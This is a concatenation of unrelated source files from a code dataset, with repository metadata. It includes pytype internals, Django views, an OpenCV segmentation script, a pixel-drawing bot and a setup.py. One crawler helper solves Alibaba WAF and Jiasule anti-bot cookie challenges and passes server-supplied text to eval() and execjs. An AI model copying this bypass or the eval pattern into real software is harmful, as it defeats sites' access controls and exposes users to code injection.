                    self.ctx.vm.late_annotations[base].append(annot)
                    actual = annot.instantiate(root_node)
                else:
                    actual = param_value.instantiate(root_node)
                match_result = self.ctx.matcher(node).compute_one_match(
                    actual, formal_param)
                if not match_result.success:
                    if isinstance(param_value, TypeParameter):
                        # bad_matches replaces type parameters in the expected type with
                        # their concrete values, which is usually what we want. But when the
                        # actual type is a type parameter, then it's more helpful to show
                        # the expected type as a type parameter as well.
                        bad = []
                        for match in match_result.bad_matches:
                            expected = dataclasses.replace(match.expected, typ=formal_param)
                            bad.append(dataclasses.replace(match, expected=expected))
                        if isinstance(formal_param, TypeParameter):
                            details = (f"TypeVars {formal_param.name} and {param_value.name} "
                                       "have incompatible bounds or constraints.")
                        else:
                            details = None
                    else:
                        bad = match_result.bad_matches
                        details = None
                    self.ctx.errorlog.bad_concrete_type(
                        self.ctx.vm.frames, root_node, bad, details)
                    return self.ctx.convert.unsolvable
        try:
            return abstract_class(base_cls, params, self.ctx, template_params)
        except abstract_utils.GenericTypeError as e:
            self.ctx.errorlog.invalid_annotation(self.ctx.vm.frames, e.annot, e.error)
            return self.ctx.convert.unsolvable

    def call(self, node, func, args, alias_map=None):
        # Calling X[...] behaves like calling the underlying base class.
        return self._call_helper(node, self.base_cls, func, args)
class _TypeVariableInstance(_base.BaseValue):
    """An instance of a type parameter."""

    def __init__(self, param, instance, ctx):
        super().__init__(param.name, ctx)
        # The type parameter this value instantiates, and the container that
        # binds it.
        self.cls = self.param = param
        self.instance = instance
        self.scope = param.scope

    @property
    def full_name(self):
        return f"{self.scope}.{self.name}" if self.scope else self.name

    def call(self, node, func, args, alias_map=None):
        # Call whatever the parameter is currently bound to in the container.
        var = self.instance.get_instance_type_parameter(self.name)
        if var.bindings:
            return function.call_function(self.ctx, node, var, args)
        else:
            return node, self.ctx.convert.empty.to_variable(self.ctx.root_node)

    def __eq__(self, other):
        if isinstance(other, type(self)):
            return self.param == other.param and self.instance == other.instance
        return NotImplemented

    def __hash__(self):
        return hash((self.param, self.instance))

    def __repr__(self):
        return f"{self.__class__.__name__}({self.name!r})"
# Concrete instance types for the two type-variable flavors.
class TypeParameterInstance(_TypeVariableInstance):
    """An instance of a TypeVar type parameter."""


class ParamSpecInstance(_TypeVariableInstance):
    """An instance of a ParamSpec type parameter."""
class _TypeVariable(_base.BaseValue):
    """Parameter of a type."""

    # Type variables are always formal (they stand for an unknown type).
    formal = True

    # Set by subclasses to the matching _TypeVariableInstance subclass.
    _INSTANCE_CLASS: Type[_TypeVariableInstance] = None

    def __init__(self,
                 name,
                 ctx,
                 constraints=(),
                 bound=None,
                 covariant=False,
                 contravariant=False,
                 scope=None):
        super().__init__(name, ctx)
        # TODO(b/217789659): PEP-612 does not mention constraints, but ParamSpecs
        # ignore all the extra parameters anyway..
        self.constraints = constraints
        self.bound = bound
        self.covariant = covariant
        self.contravariant = contravariant
        self.scope = scope

    @_base.BaseValue.module.setter
    def module(self, module):
        # Keep the scope in sync with the module the typevar is defined in.
        super(_TypeVariable, _TypeVariable).module.fset(self, module)
        self.scope = module

    @property
    def full_name(self):
        return f"{self.scope}.{self.name}" if self.scope else self.name

    def is_generic(self):
        # A typevar with no constraints and no bound accepts anything.
        return not self.constraints and not self.bound

    def copy(self):
        return self.__class__(self.name, self.ctx, self.constraints, self.bound,
                              self.covariant, self.contravariant, self.scope)

    def with_scope(self, scope):
        # Return a copy bound to the given scope (e.g. a class full name).
        res = self.copy()
        res.scope = scope
        return res

    def __eq__(self, other):
        if isinstance(other, type(self)):
            return (self.name == other.name and
                    self.constraints == other.constraints and
                    self.bound == other.bound and
                    self.covariant == other.covariant and
                    self.contravariant == other.contravariant and
                    self.scope == other.scope)
        return NotImplemented

    def __ne__(self, other):
        return not self == other

    def __hash__(self):
        # Note: scope is deliberately excluded so equal typevars in different
        # scopes still land in the same hash bucket.
        return hash((self.name, self.constraints, self.bound, self.covariant,
                     self.contravariant))

    def __repr__(self):
        return ("{!s}({!r}, constraints={!r}, bound={!r}, module={!r})"
                .format(self.__class__.__name__, self.name, self.constraints,
                        self.bound, self.scope))

    def instantiate(self, node, container=None):
        """Create an instance of this type variable, bound to `container`."""
        var = self.ctx.program.NewVariable()
        if container and (not isinstance(container, _instance_base.SimpleValue) or
                          self.full_name in container.all_template_names):
            instance = self._INSTANCE_CLASS(self, container, self.ctx)  # pylint: disable=not-callable
            return instance.to_variable(node)
        else:
            # No binding container: fall back to the constraints/bound, or Any.
            for c in self.constraints:
                var.PasteVariable(c.instantiate(node, container))
            if self.bound:
                var.PasteVariable(self.bound.instantiate(node, container))
            if not var.bindings:
                var.AddBinding(self.ctx.convert.unsolvable, [], node)
            return var

    def update_official_name(self, name):
        # PEP 484 requires TypeVar("T") to be assigned to a variable named T.
        if self.name != name:
            message = (f"TypeVar({self.name!r}) must be stored as {self.name!r}, "
                       f"not {name!r}")
            self.ctx.errorlog.invalid_typevar(self.ctx.vm.frames, message)

    def call(self, node, func, args, alias_map=None):
        return node, self.instantiate(node)
# Concrete TypeVar flavor: instances are TypeParameterInstance.
class TypeParameter(_TypeVariable):
    """Parameter of a type (typing.TypeVar)."""

    _INSTANCE_CLASS = TypeParameterInstance


# Concrete ParamSpec flavor: instances are ParamSpecInstance.
class ParamSpec(_TypeVariable):
    """Parameter of a callable type (typing.ParamSpec)."""

    _INSTANCE_CLASS = ParamSpecInstance
class ParamSpecArgs(_base.BaseValue):
    """ParamSpec.args."""

    def __init__(self, paramspec, ctx):
        super().__init__(f"{paramspec.name}.args", ctx)
        # The ParamSpec whose positional arguments this value represents.
        self.paramspec = paramspec

    def instantiate(self, node, container=None):
        return self.to_variable(node)


class ParamSpecKwargs(_base.BaseValue):
    """ParamSpec.kwargs."""

    def __init__(self, paramspec, ctx):
        super().__init__(f"{paramspec.name}.kwargs", ctx)
        # The ParamSpec whose keyword arguments this value represents.
        self.paramspec = paramspec

    def instantiate(self, node, container=None):
        return self.to_variable(node)
class Concatenate(_base.BaseValue):
    """Concatenation of args and ParamSpec."""

    def __init__(self, params, ctx):
        super().__init__("Concatenate", ctx)
        # The last parameter is the ParamSpec; everything before it is a
        # prepended positional argument type.
        self.args = params[:-1]
        self.paramspec = params[-1]

    @property
    def full_name(self):
        return self.paramspec.full_name

    def instantiate(self, node, container=None):
        return self.to_variable(node)

    @property
    def num_args(self):
        return len(self.args)

    def get_args(self):
        # Satisfies the same interface as abstract.CallableClass
        return self.args

    def __repr__(self):
        args = ", ".join(list(map(repr, self.args)) + [self.paramspec.name])
        return f"Concatenate[{args}]"
class Union(_base.BaseValue, mixin.NestedAnnotation, mixin.HasSlots):
"""A list of types.
Used for parameter matching.
Attributes:
options: Iterable of instances of BaseValue.
"""
def __init__(self, options, ctx):
super().__init__("Union", ctx)
assert options
self.options = list(options)
self.cls = self._get_class()
self._printing = False
self._instance_cache = {}
mixin.NestedAnnotation.init_mixin(self)
mixin.HasSlots.init_mixin(self)
self.set_native_slot("__getitem__", self.getitem_slot)
def __repr__(self):
if self._printing: # recursion detected
printed_contents = "..."
else:
self._printing = True
printed_contents = ", ".join(repr(o) for o in self.options)
self._printing = False
return f"{self.name}[{printed_contents}]"
def __eq__(self, other):
if isinstance(other, type(self)):
return self.options == other.options
return NotImplemented
def __ne__(self, other):
return not self == other
def __hash__(self):
# Use the names of the parameter values to approximate a hash, to avoid
# infinite recursion on recursive type annotations.
return hash(tuple(o.full_name for o in self.options))
def _unique_parameters(self):
return [o.to_variable(self.ctx.root_node) for o in self.options]
def _get_class(self):
classes = {o.cls for o in self.options}
if len(classes) > 1:
return self.ctx.convert.unsolvable
else:
return classes.pop()
def getitem_slot(self, node, slice_var):
"""Custom __getitem__ implementation."""
slice_content = abstract_utils.maybe_extract_tuple(slice_var)
params = self.ctx.annotation_utils.get_type_parameters(self)
num_params = len({x.name for x in params})
# Check that we are instantiating all the unbound type parameters
if num_params != len(slice_content):
self.ctx.errorlog.wrong_annotation_parameter_count(
self.ctx.vm.frames, self, [v.data[0] for v in slice_content],
num_params)
return node, self.ctx.new_unsolvable(node)
concrete = (
var.data[0].instantiate(node, container=abstract_utils.DUMMY_CONTAINER)
for var in slice_content)
subst = datatypes.AliasingDict()
for p in params:
for k in subst:
if k == p.name or k.endswith(f".{p.name}"):
subst.add_alias(p.full_name, k)
break
else:
subst[p.full_name] = next(concrete)
new = self.ctx.annotation_utils.sub_one_annotation(node, self, [subst])
return node, new.to_variable(node)
def instantiate(self, node, container=None):
var = self.ctx.program.NewVariable()
for option in self.options:
k = (node, _get_container_type_key(container), option)
if k in self._instance_cache:
if self._instance_cache[k] is None:
self._instance_cache[k] = self.ctx.new_unsolvable(node)
instance = self._instance_cache[k]
else:
self._instance_cache[k] = None
instance = option.instantiate(node, container)
self._instance_cache[k] = instance
var.PasteVariable(instance, node)
return var
def call(self, node, func, args, alias_map=None):
var = self.ctx.program.NewVariable(self.options, [], node)
return function.call_function(self.ctx, node, var, args)
def get_formal_type_parameter(self, t):
new_options = [option.get_formal_type_parameter(t)
for option in self.options]
return Union(new_options, self.ctx)
def get_inner_types(self):
return enumerate(self.options)
def update_inner_type(self, key, typ):
self.options[key] = typ
def replace(self, inner_types):
return self.__class__((v for _, v in sorted(inner_types)), self.ctx)
class LateAnnotation:
"""A late annotation.
A late annotation stores a string expression and a snapshot of the VM stack at
the point where the annotation was introduced. Once the expression is
resolved, the annotation pretends to be the resolved type; before that, it
pretends to be an unsolvable. This effect is achieved by delegating attribute
lookup with __getattribute__.
Note that for late annotation x, `isinstance(x, ...)` and `x.__class__` will
use the type that x is pretending to be; `type(x)` will reveal x's true type.
Use `x.is_late_annotation()` to check whether x is a late annotation.
"""
_RESOLVING = object()
def __init__(self, expr, stack, ctx, *, typing_imports=None):
self.expr = expr
self.stack = stack
self.ctx = ctx
self.resolved = False
# Any new typing imports the annotation needs while resolving.
self._typing_imports = typing_imports or set()
self._type = ctx.convert.unsolvable # the resolved type of `expr`
self._unresolved_instances = set()
self._resolved_instances = {}
# _attribute_names needs to be defined last! This contains the names of all
# of LateAnnotation's attributes, discovered by looking at
# LateAnnotation.__dict__ and self.__dict__. These names are used in
# __getattribute__ and __setattr__ to determine whether a given get/setattr
# call should operate on the LateAnnotation itself or its resolved type.
self._attribute_names = (
set(LateAnnotation.__dict__) |
set(super().__getattribute__("__dict__")))
def flatten_expr(self):
"""Flattens the expression into a legal variable name if necessary.
Pytype stores parameterized recursive types in intermediate variables. If
self is such a type, this method flattens self.expr into a string that can
serve as a variable name. For example, 'MyRecursiveAlias[int, str]' is
flattened into '_MyRecursiveAlias_LBAR_int_COMMA_str_RBAR'.
Returns:
If self is a parameterized recursive type, a flattened version of
self.expr that is a legal variable name. Otherwise, self.expr unchanged.
"""
if "[" in self.expr and self.is_recursive():
# _DOT and _RBAR have no trailing underscore because they precede names
# that we already prefix an underscore to.
return "_" + self.expr.replace(".", "_DOT").replace(
"[", "_LBAR_").replace("]", "_RBAR").replace(", ", "_COMMA_")
return self.expr
def unflatten_expr(self):
"""Unflattens a flattened expression."""
if "_LBAR_" in self.expr:
mod, dot, rest = self.expr.rpartition(".")
# The [1:] slicing and trailing underscore in _DOT_ are to get rid of
# leading underscores added when flattening.
return mod + dot + rest[1:].replace("_DOT_", ".").replace(
"_LBAR_", "[").replace("_RBAR", "]").replace("_COMMA_", ", ")
return self.expr
def __repr__(self):
return "LateAnnotation({!r}, resolved={!r})".format(
self.expr, self._type if self.resolved else None)
# __hash__ and __eq__ need to be explicitly defined for Python to use them in
# set/dict comparisons.
def __hash__(self):
return hash(self._type) if self.resolved else hash(self.expr)
def __eq__(self, other):
return hash(self) == hash(other)
def __getattribute__(self, name):
# We use super().__getattribute__ directly for attribute access to avoid a
# performance penalty from this function recursively calling itself.
get = super().__getattribute__
if name == "_attribute_names" or name in get("_attribute_names"):
return get(name)
return get("_type").__getattribute__(name) # pytype: disable=attribute-error
def __setattr__(self, name, value):
if not hasattr(self, "_attribute_names") or name in self._attribute_names:
return super().__setattr__(name, value)
return self._type.__setattr__(name, value)
def resolve(self, node, f_globals, f_locals):
"""Resolve the late annotation."""
if self.resolved:
return
# Sets resolved to a truthy value distinguishable from True so that
# 'if self.resolved' is True when self is partially resolved, but code that
# really needs to tell partially and fully resolved apart can do so.
self.resolved = LateAnnotation._RESOLVING
# Add implicit imports for typing, since we can have late annotations like
# `set[int]` which get converted to `typing.Set[int]`.
if self._typing_imports:
overlay = self.ctx.vm.import_module("typing", "typing", 0)
for v in self._typing_imports:
if v not in f_globals.members:
f_globals.members[v] = overlay.get_module(v).load_lazy_attribute(v)
var, errorlog = abstract_utils.eval_expr(self.ctx, node, f_globals,
f_locals, self.expr)
if errorlog:
self.ctx.errorlog.copy_from(errorlog.errors, self.stack)
self._type = self.ctx.annotation_utils.extract_annotation(
node, var, None, self.stack)
if self._type != self.ctx.convert.unsolvable:
# We may have tried to call __init__ on instances of this annotation.
# Since the annotation was unresolved at the time, we need to call
# __init__ again to define any instance attributes.
for instance in self._unresolved_instances:
if isinstance(instance.cls, Union):
# Having instance.cls be a Union type will crash in attribute.py.
# Setting it to Any picks up the annotation in another code path.
instance.cls = self.ctx.convert.unsolvable
else:
self.ctx.vm.reinitialize_if_initialized(node, instance)
self.resolved = True
log.info("Resolved late annotation %r to %r", self.expr, self._type)
def set_type(self, typ):
# Used by annotation_utils.sub_one_annotation to substitute values into
# recursive aliases.
assert not self.resolved
self.resolved = True
self._type = typ
def to_variable(self, node):
if self.resolved:
return self._type.to_variable(node)
else:
return _base.BaseValue.to_variable(self, node) # pytype: disable=wrong-arg-types
def instantiate(self, node, container=None):
"""Instantiate the pointed-to class, or record a placeholder instance."""
if self.resolved:
key = (node, _get_container_type_key(container))
if key not in self._resolved_instances:
self._resolved_instances[key] = self._type.instantiate(node, container)
return self._resolved_instances[key]
else:
instance = _instance_base.Instance(self, self.ctx)
self._unresolved_instances.add(instance)
return instance.to_variable(node)
def get_special_attribute(self, node, name, valself):
if name == "__getitem__" and not self.resolved:
container = _base.BaseValue.to_annotation_container(self) # pytype: disable=wrong-arg-types
return container.get_special_attribute(node, name, valself)
return self._type.get_special_attribute(node, name, valself)
def is_late_annotation(self):
return True
def is_recursive(self):
"""Check whether this is a recursive type."""
if not self.resolved:
return False
seen = {id(self)}
stack = [self._type]
while stack:
t = stack.pop()
if t.is_late_annotation():
if id(t) in seen:
return True
seen.add(id(t))
if isinstance(t, mixin.NestedAnnotation):
stack.extend(child for _, child in t.get_inner_types())
return False
class FinalAnnotation(_base.BaseValue):
"""Container for a Final annotation."""
def __init__(self, annotation, ctx):
super().__init__("FinalAnnotation", ctx)
self.annotation = annotation
def __repr__(self):
return f"Final[{self.annotation}]"
def instantiate(self, node, container=None):
return self.to_variable(node)
| google/pytype | pytype/abstract/_typing.py | _typing.py | py | 31,975 | python | en | code | 4,405 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pytype.abstract._instance_base.SimpleValue",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "pytype.abstract._instance_base",
"line_number": 27,
"usage_type": "name... |
71845863784 | from django.http import HttpResponse
from django.template import loader
def index(request):
template = loader.get_template('pages/page_index.html')
context = {}
return HttpResponse(template.render(context, request))
def page(request):
template = loader.get_template('pages/page_display.html')
context = {
'page_id': request.GET['page_id']
}
print(context['page_id'])
return HttpResponse(template.render(context, request))
| craig-glass/epic_django | pages/views.py | views.py | py | 466 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.template.loader.get_template",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "django.template.loader",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "django.http.HttpResponse",
"line_number": 8,
"usage_type": "call"
},
{
"... |
20465270702 | # -*- coding: utf-8 -*-
# @Project : CrawlersTools
# @Time : 2022/6/21 17:08
# @Author : MuggleK
# @File : base_requests.py
import json
import random
import re
import time
from chardet import detect
from httpx import Client, Response
from loguru import logger
from CrawlersTools.requests.proxy import get_proxies
from CrawlersTools.requests.random_ua import UserAgent
class BaseRequests(object):
"""
A Rquests Class base on httpx
Usage:
```python
>>> base_requests = BaseRequests().base_requests
>>> response = base_requests('https://example.org')
```
"""
def base_requests(
self,
url: str,
session: object = None,
headers=UserAgent(),
method: str = "get",
proxies: dict = None,
proxy_url: str = None,
http2: bool = False,
encoding: str = None,
retry: int = 3,
**kwargs
) -> Response:
"""
内置ali_waf & 加速乐解密
:param url: 请求链接
:param session: 维持session可从外部传入
:param headers: 请求头
:param method: 具体请求方式
:param proxies: ip代理,配合proxy_url可失效自动切换
:param proxy_url: 获取代理链接
:param http2: 是否使用http2.0协议
:param retry: 请求重试次数,默认3次
:param encoding: 指定编码,默认detect解析,效果同requests的apparent_encoding
:param kwargs: 请求时需携带的其他参数
:return: Response
:exception: 1.代理失效&超过重试次数返回None 2.waf或加速乐解密失败返回None
"""
for _ in range(retry):
try:
proxies = proxies if proxies else get_proxies(proxy_url, http2=True)
session = session or Client(
http2=http2,
headers=headers,
proxies=proxies,
timeout=kwargs.get("timeout", 20),
verify=kwargs.get("verify", True),
follow_redirects=kwargs.get("allow_redirects", False)
)
response = session.request(
method=method.lower(),
url=url,
headers=headers,
content=kwargs.get("content"),
data=kwargs.get("data"),
files=kwargs.get("files"),
json=kwargs.get("json"),
params=kwargs.get("params"),
timeout=kwargs.get("timeout", 20),
follow_redirects=kwargs.get("allow_redirects", False)
)
response.encoding = encoding if encoding else detect(response.content)['encoding'] # chardet 更准确
if 200 <= response.status_code < 300 or response.status_code == 412:
if 'arg1=' in response.text:
acw_tc_cookie = f'acw_tc={session.cookies.get("acw_tc")};'
headers["Cookie"] = headers["Cookie"] + acw_tc_cookie if headers.get("Cookie") else acw_tc_cookie
reg_arg1 = re.findall("var arg1='(.*)';", response.text)[0]
arg2 = self.ali_waf(reg_arg1)
headers['cookie'] += f'acw_sc__v2={arg2}'
continue
return response
elif response.status_code == 521:
if 'document.cookie' in response.text:
cookie_key = [key for key in list(session.cookies.keys()) if key.startswith("__jsluid")][0]
headers["Cookie"] = headers["Cookie"] if headers.get("Cookie") else f'{cookie_key}={session.cookies.get(cookie_key)};'
headers["Cookie"] += f'{self.process_fuck_js(response.text)};'
continue
elif 'chars' in response.text:
__jsl_clearance_s = self.process_clearance(response.text)
headers["Cookie"] = '='.join(headers["Cookie"].split('=')[:-1]) + f'={__jsl_clearance_s};'
continue
else:
proxies = None
time.sleep(random.uniform(0, 1))
continue
except Exception as err:
logger.error(f'url:{url} error:{err} proxies:{proxies}')
proxies = None
time.sleep(random.uniform(0, 1))
continue
@staticmethod
def ali_waf(arg1):
"""
acw_sc__v2算法
:param arg1:
:return:
"""
list1 = [15, 35, 29, 24, 33, 16, 1, 38, 10, 9, 19, 31, 40, 27, 22, 23, 25, 13, 6, 11, 39, 18, 20, 8, 14, 21, 32,
26, 2, 30, 7, 4, 17, 5, 3, 28, 34, 37, 12, 36]
dict1 = {}
for i in range(len(arg1)):
string = arg1[i]
for j in range(len(list1)):
if list1[j] == i + 1:
dict1[j] = string
str1 = ''.join([dict1.get(i) for i in range(40)])
str1_list = list(str1)
str2 = "3000176000856006061501533003690027800375"
str2_list = list(str2)
str4 = ''
for m in range(0, len(str1_list), 2):
int1 = int(''.join(str1_list[m:m + 2]), 16)
int2 = int(''.join(str2_list[m:m + 2]), 16)
str3 = str(hex(int1 ^ int2))[2:]
if len(str3) == 1:
str3 = '0' + str3
str4 += str3
return str4
@staticmethod
def process_fuck_js(js_text):
import execjs
js_text = js_text.split(';location.href=loc')[0].split('document.cookie=')[-1]
r = execjs.eval(js_text).split(';')[0]
return r
@staticmethod
def process_clearance(html):
import hashlib
data = json.loads(re.findall(r'go\((.*?)\)', html)[1])
chars_length = len(data.get('chars'))
for i in range(chars_length):
for j in range(chars_length):
result = data.get('bts')[0] + data.get('chars')[i] + data.get('chars')[j] + data.get('bts')[1]
b = eval('hashlib.{}()'.format(data.get('ha')))
b.update(result.encode(encoding='utf-8'))
res = b.hexdigest()
if res == data.get('ct'):
return result
| MuggleK/CrawlersTools | CrawlersTools/requests/base_requests.py | base_requests.py | py | 6,417 | python | en | code | 16 | github-code | 36 | [
{
"api_name": "CrawlersTools.requests.random_ua.UserAgent",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "CrawlersTools.requests.proxy.get_proxies",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "httpx.Client",
"line_number": 64,
"usage_type": "call... |
27775098322 | import matplotlib.pyplot as plt
import numpy as np
# Create some data to plot
x = np.arange(5)
y = [2, 5, 3, 8, 10]
# Set the xticks with labels that include LaTeX and \n
xticks = [r'Label 1', r'Label$_{2}\n$with superscript $x^2$', r'Label 3', r'Label$_{4}$', r'Label 5']
plt.plot(x, y)
plt.xticks(x, xticks, rotation=0)
# Enable LaTeX rendering
plt.rc('text', usetex=True)
# Show the plot
plt.show()
| JinyangLi01/Query_refinement | Experiment/TPCH/running_time/try.py | try.py | py | 406 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.arange",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplo... |
36109925973 | #!/usr/bin/env python3
#_main_.py
import writer
import getimage
import argparse
import os
from time import sleep
import gimmedahandler #import shit
##set up the parser
parser = argparse.ArgumentParser(
description= "A simple bot to place pixels from a picture to whatever you want \n Please note to write files with their according filetypes",
epilog= "Have fun with my Bot",
prefix_chars="-/",
add_help=False
)
# add arguments to the parser
parser.add_argument("-?", "--help", action="help", help="Show this help message")
parser.add_argument("--User_Interface", "-ui", action="store_true", dest="UI", help="Wether or not you will use the built-in User Interface. If given, will ignore all other parameters.")
parser.add_argument("-s", "--silence", "-s", action="store_true", dest="silence", help="If this parameter is given, the Program will not output anyting (exept fatal errors)")
parser.add_argument("-nc", "--no_colors", action="store_true", dest="nc", help="Wether to not use custom text coloring(e.g. if the output is saved to a file)")
parser.add_argument("-p", "--picture", type=str, dest="inpath", action="store", help="The path of the picture you want the Bot to draw.")
parser.add_argument("-h", "--handler", type=str, dest="handler", action="store", help="The file name of the handler that the Bot will use to draw your image.")
parser.add_argument("-sx", "--startx", type=int, dest="startx", action="store", help="The x coordinate of the top left corner of the canvas \n that the bot will draw your image into")
parser.add_argument("-sy", "--starty", type=int, dest="starty", action="store", help="The y coordinate of the top left corner of the canvas \n that the bot will draw your image into")
parser.add_argument("-ex", "--endx", type=int, dest="endx", action="store", help="The x coordinate of the bottom right corner of the canvas \n that the bot will draw your image into")
parser.add_argument("-ey", "--endy", type=int, dest="endy", action="store", help="The y coordinate of the bottom right corner of the canvas \n that the bot will draw your image into")
args = parser.parse_args() #parse the given arguments
#print("hehe", flush=True)
if args.UI and args.silence:
while True:
sleep(1)
#how you gonna use a invisible UI???
if args.nc: #creating a temporary file so that the toolset module knows wether or not to use custom colouring
f = open("nc.temp", "x")
f.close()
if args.UI == False and args.inpath == None and args.handler == None and args.startx == None and args.starty == None:
parser.parse_args(["-?"]) #return the help page if no args are given
#print(args.handler)
if args.UI:
image, size = getimage.imageprompt(args.UI) #getting the image stuff
handler = gimmedahandler.gethandler(args.handler, args.UI) #retriveving the handler
#print(handler)
startx, starty, endx, endy = writer.getcanvas(args.UI, args.startx, args.starty, args.endx, args.endy) # retrieving the info about the canvas coordinates from the user
writer.write(image, handler, startx, starty, endx, endy, size, args.UI, args.silence) #giving shit to the writing algorithms
if args.nc: #removing the temporary file
os.remove("./nc.temp")
else:
handler = gimmedahandler.gethandler(args.handler, args.UI) #prepping handler
image, size = getimage.imageprompt(args.UI, args.inpath) #prepping the given img
startx, starty, endx, endy = writer.getcanvas(args.UI, args.startx, args.starty, args.endx, args.endy) #checking the coords
writer.write(image, handler, startx, starty, endx, endy ,size, args.UI, args.silence) #writing the image to the canvas
if args.nc: #removing the temporary file
os.remove("./nc.temp")
| a-usr/pixelbot | _main_.py | _main_.py | py | 3,718 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "getimage.imageprompt",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "gimmedahandle... |
536521380 | import os
import cv2
import numpy as np
import skimage.exposure as sk_exposure
import matplotlib.pyplot as plt
from skimage.io import imshow, imread
from skimage.color import rgb2hsv, hsv2rgb
from skimage import color
from scipy.ndimage.filters import maximum_filter
from scipy.ndimage.morphology import generate_binary_structure, binary_erosion
low=40
high=60
kernel = np.ones((4,4), np.uint8)
path_image_contour= 'C:/Users/Laura/AppData/Local/Programs/Python/Python36/Phenotype/Paint/001'
FILENAME='C:/Users/Laura/AppData/Local/Programs/Python/Python36/Phenotype/Images/006/TCGA-001-tile-r12-c5-x4096-y11264-w1024-h1024.PNG' #image can be in gif jpeg or png format
path_image_final = 'C:/Users/Laura/AppData/Local/Programs/Python/Python36/Phenotype/Images/Image_seg'
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
#img=cv2.imread(FILENAME)
#imgplot = plt.imshow(img)
#plt.show()
kernel_dil = np.ones((3,3), np.uint8)
#def contour_img (path_image_contour) :
list_img = os.listdir(path_image_contour)
for annot_num, annotation_tif in (enumerate(list_img)):
imagepath =path_image_contour+'/'+ annotation_tif
print(annotation_tif)
img = cv2.imread(imagepath,1)
p= os.path.basename(annotation_tif)
name1 = os.path.splitext(p)[0]
fname = name1 + '.png'
path_image_final_1 = os.path.join(path_image_final,fname)
img= cv2.resize(img, (364,364), interpolation = cv2.INTER_AREA)
cv2.imshow('',img)
cv2.waitKey(0)
img = cv2.erode(img, kernel_dil, iterations=1)
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
img_fin = np.zeros(img.shape, dtype=np.uint8)
# img_hsv = cv2.dilate(img_hsv, kernel, iterations=1)
lower_mask = img_hsv [:,:,0] > 90
upper_mask = img_hsv [:,:,0] < 130
saturation = img_hsv [:,:,1] > 100
mask = upper_mask*lower_mask *saturation
red = img[:,:,0]*mask
green = img[:,:,1]*mask
blue = img[:,:,2]*mask
red_girl_masked = np.dstack((red,green,blue))
red_girl_masked = cv2.cvtColor(red_girl_masked, cv2.COLOR_BGR2GRAY)
cv2.imshow('',red_girl_masked)
cv2.waitKey(0)
ret,threshNuclei = cv2.threshold(red_girl_masked,0,255,cv2.THRESH_BINARY)
contoursNuclei, hierarchy = cv2.findContours(threshNuclei,cv2.RETR_TREE ,cv2.CHAIN_APPROX_SIMPLE)
# cv2.drawContours(img ,contoursNuclei, -1, (0,255,0), 1)
# cv2.imshow('',img)
# cv2.waitKey(0)
for c in zip(contoursNuclei, hierarchy[0]):
if cv2.contourArea(c[0]) > 200:
if c[1][3] != -1:
temp = np.zeros(img.shape, dtype=np.uint8)
cv2.fillPoly(temp, pts=[c[0]], color=(255, 255, 255))
# cv2.imshow('',temp)
# cv2.waitKey(0)
masked_image = cv2.bitwise_and(img, temp)
Mask_black = cv2.bitwise_not(masked_image)
mask_ = cv2.bitwise_not(temp)
masked_image_ = cv2.bitwise_or(masked_image, mask_)
temp_1 = cv2.cvtColor(temp, cv2.COLOR_BGR2GRAY )
#image_max = ndi.maximum_filter(masked_image_, size=20, mode='constant')
dst = cv2.cornerHarris(temp_1,12,13,0.20)
dst = cv2.dilate(dst,None)
masked_image_shape = (masked_image_[dst>0.01*dst.max()]).shape
masked_image_[dst>0.01*dst.max()]=[0,0,255]
# cv2.imshow('dst',masked_image_)
# cv2.waitKey(0)
print( masked_image_shape[0])
if masked_image_shape[0]< 290:
img_fin = img_fin+temp
elif len(masked_image_[dst>0.09*dst.max()])<210:
img_fin = img_fin+temp
# cv2.imshow('',img_fin)
# cv2.waitKey(0)
cv2.imwrite(path_image_final_1, img_fin)
cv2.imshow('',img_fin)
cv2.waitKey(0)
# cv2.drawContours(img ,contoursNuclei, -1, (0,255,0), 1)
| LauraMarin/Tesis_2023 | Unet_Nuclei_feature/Contour_seg.py | Contour_seg.py | py | 4,106 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.ones",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "numpy.ones",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number... |
24426403241 | #!/usr/bin/env python
import sys
import os
from distutils.core import setup
from distutils.command.install import install, write_file
from distutils.command.install_egg_info import to_filename, safe_name
from functools import reduce
class new_install(install):
def initialize_options(self):
install.initialize_options(self)
def run(self):
install.run(self)
# hack to remove old module
old_path = os.path.join(self.install_libbase, "playitslowly", "playitslowly.py")
for p in (old_path + x for x in ("o", "c", "")):
if os.path.exists(p):
self.execute(os.unlink, (p, ), "Removing old file %r" % p)
# write install-info
basename = "%s-py%s.install-info" % (
to_filename(safe_name(self.distribution.get_name())),
sys.version[:3]
)
install_info = os.path.join(self.install_libbase, basename)
outputs = self.get_outputs()
if self.root: # strip any package prefix
root_len = len(self.root)
for counter in range(len(outputs)):
outputs[counter] = outputs[counter][root_len:]
self.execute(write_file,
(install_info, outputs),
"writing install-info to '%s'" % install_info)
def ls_r(dir):
def do_reduce(a, b):
files = []
for f in b[2]:
files.append(os.path.join(b[0], f))
a.append((b[0], files))
return a
return reduce(do_reduce, os.walk(dir), [])
kwargs = {
'cmdclass': {'install': new_install},
'name': 'playitslowly',
'version': "1.5.1",
'description': 'A tool to help you when transcribing music. It allows you to play a piece of music at a different speed or pitch.',
'author': 'Jonas Wagner',
